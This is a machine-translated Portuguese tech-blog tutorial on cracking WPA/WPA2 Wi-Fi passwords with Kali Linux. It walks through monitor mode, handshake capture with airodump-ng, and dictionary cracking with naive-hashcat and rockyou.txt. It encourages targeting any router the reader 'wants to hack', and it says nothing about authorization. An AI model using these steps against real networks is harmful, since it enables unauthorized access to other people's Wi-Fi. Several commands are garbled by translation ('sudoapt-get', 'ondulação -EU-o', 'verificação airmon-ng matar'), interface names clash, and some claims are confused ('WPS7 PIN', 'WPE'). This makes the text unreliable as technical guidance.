Você está na página 1de 10

Best Tech Tips

Best Tech Tips (/pt) /  Miscelânea (/pt/parts/40-miscellanea)


/  Ataques Kali Linux WPA e WPA2 - Dica Linux (/pt/chapters/2691-kali-linux-wpa-and-wpa2-
attacks--linux-hint)

Ataques Kali Linux WPA e


WPA2 - Dica Linux
(/pt/chapters/2691-kali-linux-wpa-and-wpa2-attacks--linux-hint)

Categoria
Miscelânea (/pt/parts/40-miscellanea)
|

July 30, 2021 20:17

Este artigo lhe dará uma visão geral de wi-fi e hacking wi-fi. Começaremos com uma introdução
básica de Wi-Fi e hacking.

Introdução
Wireless fidelity, ou Wi-Fi, é um tipo de tecnologia empregada para fornecer conectividade a
uma rede de computadores sem um cabo ou conexão com fio. O Wi-Fi funciona na faixa de 2,4
Ghz a 5 Ghz e não deve interferir em telefones celulares, rádio, televisão ou rádios portáteis. O
Wi-Fi funciona transmitindo dados por ondas de rádio entre um dispositivo cliente e um
dispositivo chamado roteador. Um roteador pode transmitir dados para sistemas internamente
ou externamente para a Internet. O Wi-Fi não é nem mais nem menos seguro do que uma rede
tradicional com fio, mas é uma interface completamente diferente. A coisa mais importante a
lembrar é que Wired Equivalent Privacy (WEP) foi lançado em 1997 e é fácil de violar. O WEP
pode ser quebrado em minutos ou menos. Seus dispositivos modernos não funcionarão com a
rede WEP e a maioria dos roteadores não oferece mais suporte para ela. O WEP atualizado
também pode ser invadido por meio de métodos de hacking.

Hacking
Simplificando, crack ou invadir as informações pessoais de alguém é conhecido como hacking.
Os hackers podem acessar facilmente seu dispositivo pessoal ou computador. Eles podem
quebrar suas senhas e obter acesso à sua rede sem fio. Eles podem contornar a segurança da
rede sem fio e invadir, independentemente do tipo de criptografia que o usuário esteja usando.

Normalmente, se você deseja invadir a rede sem fio de alguém, primeiro você precisa saber
sobre a criptografia que está sendo usada. Conforme mencionado anteriormente, a rede do tipo
WPE não é segura há algum tempo. Geralmente, pode ser invadido em questão de minutos. O
mesmo acontece com a rede WPA se você usar uma senha fraca. No entanto, se você usar
uma senha forte, ela é relativamente segura, exceto para WPS7 PIN. Esta é uma vulnerabilidade
de base de hardware que muitos roteadores usam, permitindo que os hackers obtenham o pino
que fornece acesso completo ao roteador. Geralmente, é um número de oito dígitos escrito na
parte inferior do roteador. Você pode derivar esse número seguindo as etapas abaixo.

Abra o Terminal Kali Linux


O primeiro passo é simplesmente abrir o terminal Kali Linux. Para fazer isso, pressione ALT +
CTRL + T. Você também pode pressionar o ícone do aplicativo do terminal para abrir o terminal.
Digite o comando para a instalação do aircrack-
ng
A próxima etapa é instalar o Aircrack-ng. Digite o seguinte comando para fazer isso:

$ sudoapt-get install aircrack-ng

Digite a senha para fazer o login


Digite sua senha de root para habilitar o acesso. Depois de inserir a senha de login, pressione o
Digitar botão para continuar.

Instale o Aircrack-ng
Logo após o login, pressione o botão Y. Isso permitirá a instalação do aircrack-ng.

Ligue o airmon-ng
Airmon-ng é o software usado para converter o modo gerenciado no modo monitor. Use o
seguinte comando para ligar o airmon-ng:

$ airmon-ng
Encontrar o nome do monitor
A próxima etapa é encontrar o nome do monitor para continuar a hackear. Você pode ver o
nome do monitor na coluna da interface. Em alguns casos, você pode não conseguir visualizar
o nome do monitor. Este erro ocorre se a sua placa não for compatível.

Comece a monitorar a rede


Digite o seguinte comando para iniciar o processo de monitoramento:

$ airmon-ng start wlan0

Se você está alvejando outra rede, deve substituir ‘wlan0’ pelo nome de rede correto.
Habilitar Interface do Modo Monitor
O seguinte comando é usado para habilitar a interface do modo monitor:

$ iwconfig

Elimine processos que retornam erros


Seu sistema pode causar alguma interferência. Use o seguinte comando para remover este
erro.

$ verificação airmon-ng matar


Revisão da interface do monitor
A próxima etapa é revisar o nome do monitor. Neste caso, é denominado ‘wlan0mon’.

Obtenha os nomes de todos os roteadores


Os nomes de todos os roteadores disponíveis aparecerão após você inserir o seguinte
comando.

$ airodump-ng mon0

Encontre o nome do roteador


Primeiro, você precisa encontrar o nome do roteador específico que deseja hackear.

Certifique-se de que o roteador usa segurança


WPA ou WPA2
Se o nome WPA aparecer na tela, você pode continuar a hackear.

Observe o endereço MAC e o número do canal.

Estas são as informações básicas sobre a rede. Você pode visualizá-los no lado esquerdo da
rede.

Monitore a rede selecionada


Use o seguinte comando para monitorar os detalhes da rede que você deseja hackear.

$ airodump-ng -c canal --bssid MAC -C/raiz/Área de Trabalho/ mon0

Aguarde o handshake
Espere até ver ‘WPA HANDSHAKE’ escrito em sua tela.

Saia da janela pressionando CTRL + C. Um arquivo cap aparecerá na tela do computador.


Renomear o arquivo cap
Para sua facilidade, você pode editar o nome do arquivo. Use o seguinte comando para este
propósito:

$ mv ./-01.cap name.cap

Converter arquivo em formato hccapx


Você pode converter o arquivo para o formato hccapx facilmente com a ajuda do conversor
Kali.

Use o seguinte comando para fazer isso:

$ cap2hccapx.bin name.cap name.hccapx

Instalar ingênuo-hash-cat
Agora, você pode quebrar a senha usando este serviço. Use o seguinte comando para começar
a crackear.

$ sudogit clone https://github.com/Brannondorsey/ingênuo-hashcat

$ CD ingênuo-haxixe

$ ondulação -EU-o ditos/rockyou.txt

Corra ingênuo-hash-cat
Para executar o serviço ingênuo-hash-cat, digite o seguinte comando:

$ HASH_FILE= nome.hccapx POT_FILE= name.pot HASH_TYPE=2500 ./naive-hash-cat.sh

Aguarde até que a senha da rede seja quebrada


Assim que a senha for quebrada, ela será mencionada no arquivo. Esse processo pode levar
meses ou até anos para ser concluído. Digite o seguinte comando quando este processo for
concluído para salvar a senha. A senha quebrada é mostrada na última captura de tela.

[cc lang = ”bash” largura = ”780 ″]

$ aircrack-ng -a2 -b MAC -w rockyou.txt name.cap

[cc]

Conclusão
Usando o Kali Linux e suas ferramentas, hackear pode se tornar fácil. Você pode facilmente
obter acesso às senhas apenas seguindo as etapas listadas acima. Esperançosamente, este
artigo o ajudará a quebrar a senha e se tornar um hacker ético.
instagram stories viewer (https://dumpor.com)

Search

Categorias
Comandos A Z (/pt/parts/10-a-z-commands)
Android (/pt/parts/11-android)
Ecossistema Apple (/pt/parts/12-apple-ecosystem)
Apple Tv (/pt/parts/13-apple-tv)
So Chrome (/pt/parts/14-chrome-os)
Computação Em Nuvem (/pt/parts/15-cloud-computing)
Dicas De Informática (/pt/parts/16-computer-tips)
Sites Legais (/pt/parts/17-cool-websites)
Criptomoeda (/pt/parts/18-cryptocurrency)
Ciência De Dados (/pt/parts/19-data-science)
Downloads De Software Grátis (/pt/parts/20-free-software-downloads)
Coisas Divertidas (/pt/parts/21-fun-stuff)
Aparelhos (/pt/parts/22-gadgets)
Jogos (/pt/parts/23-gaming)
Software / Dicas Do Google (/pt/parts/24-google-software-tips)
Dicas Do Internet Explorer (/pt/parts/25-internet-explorer-tips)
Iot Internet Das Coisas (/pt/parts/26-iot--internet-of-things)
Ipad (/pt/parts/27-ipad)
Iphone (/pt/parts/28-iphone)
Linux (/pt/parts/29-linux)
Postagens Em Destaque (/pt/parts/2-featured-posts)
Mac (/pt/parts/30-mac)
Mac Os X (/pt/parts/31-mac-os-x)
Ml & Ai (/pt/parts/32-ml--ai)
Sra. Dicas De Escritório (/pt/parts/33-ms-office-tips)
Ferramentas Online (/pt/parts/34-online-tools)
Software Livre (/pt/parts/35-open-source-software)
Dicas De Programação (/pt/parts/36-programming-tips)
Computador De Placa única (/pt/parts/37-single-board-computer)
Windows Xp (/pt/parts/38-windows-xp)

Última postagem do blog

JUL How two Build a House in Minecraft [Passo a Passo] - Linux Hint
30 (/pt/chapters/2586-how-two-build-a-house-in-minecraft-step-by-step---linux-h)

JUL Como obter um substring Bash após um caractere especificado - Dica do Linux
30 (/pt/chapters/2588-how-to-obtain-a-bash-substring-after-a-specified-character)

JUL Como construir seu próprio Kali Linux ISO - Linux Hint
29 (/pt/chapters/125-how-to-build-your-own-kali-linux-iso--linux-hint)

Categorias

Comandos A Z (/pt/parts/10-a-z-commands)

Android (/pt/parts/11-android)

Ecossistema Apple (/pt/parts/12-apple-ecosystem)

Apple Tv (/pt/parts/13-apple-tv)

So Chrome (/pt/parts/14-chrome-os)

Computação Em Nuvem (/pt/parts/15-cloud-computing)

Dicas De Informática (/pt/parts/16-computer-tips)

Sites Legais (/pt/parts/17-cool-websites)

Criptomoeda (/pt/parts/18-cryptocurrency)

Ciência De Dados (/pt/parts/19-data-science)
Mais recentes

Como consertar o Internet Explorer encontrou um problema e precisa ser fechado
(/pt/chapters/6975-how-to-fix-internet-explorer-has-encountered-a-problem-and-n)

Por que o Wireshark diz que nenhuma interface foi encontrada - Linux Hint
(/pt/chapters/3479-why-does-wireshark-say-no-interfaces-found--linux-hint)

Como ir para a Linha X em Nano? - Dica Linux (/pt/chapters/3457-how-to-go-to-line-x-in-nano-
--linux-hint)
©
2022
Best Tech Tips
(https://ciksiti.com/)
All Rights Reserved.




Você também pode gostar